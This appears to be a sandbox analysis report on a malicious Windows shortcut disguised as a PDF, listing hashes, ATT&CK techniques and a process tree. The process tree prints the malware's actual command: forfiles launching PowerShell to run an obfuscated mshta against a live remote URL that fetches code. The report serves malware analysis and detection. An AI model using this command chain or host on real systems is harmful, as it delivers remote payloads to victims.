a33bf755d49373160c54ca9d13df9fd2e5efbe0f86d22a208d9687790fe00ed4

Analysis

max time kernel
118s
max time network
122s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
25-10-2024 17:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

A/Instruction_1928.pdf.lnk
Size

2KB
MD5

b874532b90be5bd56eca4b28951f2f76
SHA1

0356abd795c63a10cad9383a767687c92fc1b5f8
SHA256

92216ebdd28ee3a886e296fd4ef8c5341b8c9dba8f1d1c498db62c95efc97262
SHA512

036d26c62b65af38075842642708cf3e3f8eaef05025a7b3449d39e2f15c09a80cfd79ddf411c6d6d1aadd7fca4a462c4f86b5f1375166928457b759822586d3

Score

7^/10

defense_evasion

Malware Config

Signatures

Indirect Command Execution 1 TTPs 1 IoCs

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

defense_evasion

Indirect Command Execution

T1202

Processes:

forfiles.exe

pid	Process
1860	forfiles.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid	Process
2836	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description	pid	Process
Token: SeDebugPrivilege	2836	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

cmd.exeforfiles.exe

description	pid	Process	procid_target
PID 2808 wrote to memory of 1860	2808	cmd.exe	31
PID 2808 wrote to memory of 1860	2808	cmd.exe	31
PID 2808 wrote to memory of 1860	2808	cmd.exe	31
PID 1860 wrote to memory of 2836	1860	forfiles.exe	32
PID 1860 wrote to memory of 2836	1860	forfiles.exe	32
PID 1860 wrote to memory of 2836	1860	forfiles.exe	32

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\A\Instruction_1928.pdf.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2808
- C:\Windows\System32\forfiles.exe
  "C:\Windows\System32\forfiles.exe" /p C:\ /m Use*s /c "powershell Start-Process \*i*\*2\m?h*e https://ftp.timeless-tales.shop/api/reg/Panto"
  2⤵
  - Indirect Command Execution
  - Suspicious use of WriteProcessMemory
  PID:1860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Start-Process \*i*\*2\m?h*e https://ftp.timeless-tales.shop/api/reg/Panto
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2836

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indirect Command Execution

T1202

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2836-40-0x000007FEF668E000-0x000007FEF668F000-memory.dmp

Filesize
4KB

Download
memory/2836-41-0x000000001B180000-0x000000001B462000-memory.dmp

Filesize
2.9MB

Download
memory/2836-43-0x00000000023A0000-0x00000000023A8000-memory.dmp

Filesize
32KB

Download
memory/2836-42-0x000007FEF63D0000-0x000007FEF6D6D000-memory.dmp

Filesize
9.6MB

Download
memory/2836-44-0x000007FEF63D0000-0x000007FEF6D6D000-memory.dmp

Filesize
9.6MB

Download
memory/2836-45-0x000007FEF63D0000-0x000007FEF6D6D000-memory.dmp

Filesize
9.6MB

Download
memory/2836-46-0x000007FEF63D0000-0x000007FEF6D6D000-memory.dmp

Filesize
9.6MB

Download
memory/2836-47-0x000007FEF63D0000-0x000007FEF6D6D000-memory.dmp

Filesize
9.6MB

Download
memory/2836-48-0x000007FEF63D0000-0x000007FEF6D6D000-memory.dmp

Filesize
9.6MB

Download